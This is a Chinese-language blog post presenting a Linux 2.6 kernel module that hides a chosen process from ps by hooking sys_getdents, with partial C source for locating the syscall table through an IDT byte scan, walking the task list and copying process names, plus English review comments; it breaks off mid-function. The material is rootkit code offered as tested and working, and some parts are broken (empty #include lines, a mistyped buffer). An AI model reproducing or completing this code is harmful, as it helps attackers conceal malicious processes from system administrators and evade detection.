        2. Linux 2.6内核中进程隐藏实现办法


            很早以前的小程序，比较简单但是觉得有趣

              原理很简单，Linux 查看进程的命令 ps 是通过系统调用 sys_getdents 实现的，sys_getdents 用于获取一个指定路径下的目录条目，实际上就是枚举

              /proc/ 下的 pid，这样我们只需要 hook 一下 sys_getdents，把相应的要隐藏的 pid 信息去掉即可。

              以下是 LKM 代码，在 Linux-2.6.14 上测试并运行成功

              #include

              #include

              #include

              #include

              #include

              #include

              #include

              #include

              #define CALLOFF 100  /* size in bytes of the window findoffset() scans from a given start address */

              /* Module parameter: name of the process this module is meant to hide. */
              char *processname;

              /* Permission mask 0: no entry is created under /sys/module/<name>/parameters,
               * so the configured name cannot be read back from sysfs. */
              module_param(processname, charp, 0);

              /* IDTR image: 16-bit limit plus 32-bit base (layout fits 32-bit x86).
               * NOTE(review): presumably filled by an sidt executed in code outside this chunk -- confirm. */
              struct {
              unsigned short limit;
              unsigned int base;
              } __attribute__ ((packed)) idtr;

              /* One 8-byte IDT gate descriptor (off1, sel, none, flags, off2); idt points at the table.
               * NOTE(review): how the entry is used to reach the syscall dispatch code is not visible here. */
              struct {
              unsigned short off1;
              unsigned short sel;
              unsigned char none,
              flags;
              unsigned short off2;
              } __attribute__ ((packed)) * idt;

              /* Address of the kernel's syscall table, resolved at runtime by code outside this
               * chunk (the findoffset() byte scan below is presumably part of that lookup -- confirm). */
              void** sys_call_table;

              /* Saved pointer to the original getdents handler (the linux_dirent64 variant),
               * presumably restored on unload and called through after filtering -- the hook
               * itself is outside this chunk. */
              asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

              /*
               * Scan at most CALLOFF bytes starting at `start` for the three-byte
               * sequence ff 14 85 and return a pointer to its first byte, or NULL
               * when it is absent.  The window check is applied to p only, so the
               * p + 1 / p + 2 reads can touch up to two bytes past start + CALLOFF.
               * NOTE(review): the byte pattern is presumably the opcode prefix of the
               * indirect call through the syscall table in the 32-bit x86 syscall
               * entry stub -- confirm against the kernel build this was tested on.
               * A module that byte-scans kernel text for such a pattern is a strong
               * indicator of syscall-table hijacking, which is what this LKM does.
               */
              char * findoffset(char *start)
              {
                  char *p;
                  for (p = start; p < start + CALLOFF; p++)
                      if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
                          return p;
                  return NULL;
              }

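              /*
               * Parse a string consisting only of decimal digits into an int.
               *
               * @param str  NUL-terminated string; must not be NULL.
               * @return the parsed value; -1 when str contains any non-digit
               *         character (a sign or whitespace counts as non-digit) or
               *         when the value does not fit in an int.  An empty string
               *         yields 0.
               *
               * The scan runs forward so that an empty string never forms a
               * pointer before the start of the array (the previous backwards
               * loop computed str + strlen(str) - 1, which is undefined for "").
               */
              int myatoi(char *str)
              {
                  const int max_int = (int)(~0u >> 1); /* INT_MAX without pulling in <limits.h> */
                  int res = 0;
                  const char *ptr;

                  for (ptr = str; *ptr != '\0'; ptr++) {
                      int digit;

                      if (*ptr < '0' || *ptr > '9')
                          return (-1);
                      digit = *ptr - '0';
                      /* reject before res * 10 + digit would overflow (signed overflow is UB) */
                      if (res > (max_int - digit) / 10)
                          return (-1);
                      res = res * 10 + digit;
                  }
                  return (res);
              }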

              /*
               * Walk the task list (list_for_each_entry over the current task's
               * ->tasks link) and return the task_struct whose pid equals `pid`,
               * or NULL when none matches.
               *
               * Side effect: a hit prints "pid found" to the kernel log (no KERN_
               * level given), which leaves a visible dmesg artifact -- a useful
               * detection signal for this module.
               *
               * NOTE(review): no rcu_read_lock()/tasklist_lock is taken around the
               * walk in this chunk, so the list can change underneath it, and the
               * returned pointer carries no reference (no get_task_struct), so it
               * may dangle by the time the caller uses it.
               */
              struct task_struct *get_task(pid_t pid)
              {
                  struct task_struct *p = get_current(),*entry=NULL;
                  list_for_each_entry(entry,&(p->tasks),tasks)
                  {
                      if(entry->pid == pid)
                      {
                          printk("pid found\n");
                          return entry;
                      }
                  }
                  return NULL;
              }

              /*
               * Copy p->comm into buf, escaping a backslash as "\\\\" and a newline
               * as "\\n".  Copying stops at the first NUL byte or after
               * sizeof(p->comm) bytes, whichever comes first; the NUL itself is
               * overwritten by the trailing '\n'.
               *
               * @param p    task whose comm is rendered
               * @param buf  destination; must hold at least 2 * sizeof(p->comm) + 1
               *             bytes, since every source byte may expand to two and a
               *             '\n' is appended
               * @return pointer to the byte after the appended '\n'.  The output is
               *         NOT NUL-terminated.
               */
              static inline char *get_name(struct task_struct *p, char *buf)
              {
                  int i;
                  char *name;
                  name = p->comm;
                  i = sizeof(p->comm);
                  do {
                      unsigned char c = *name;
                      name++;
                      i--;
                      *buf = c;
                      if (!c)
                          break;   /* end of comm; the stored NUL is replaced by '\n' below */
                      if (c == '\\') {
                          buf[1] = c;   /* *buf already holds the first backslash */
                          buf += 2;
                          continue;
                      }
                      if (c == '\n') {
                          buf[0] = '\\';
                          buf[1] = 'n';
                          buf += 2;
                          continue;
                      }
                      buf++;
                  }
                  while (i);
                  *buf = '\n';
                  return buf + 1;
              }

              int get_process(pid_t pid)

              {

              struct task_struct *task = get_task(pid);

              char *buffer[64] = {0};

              if (task)

              {
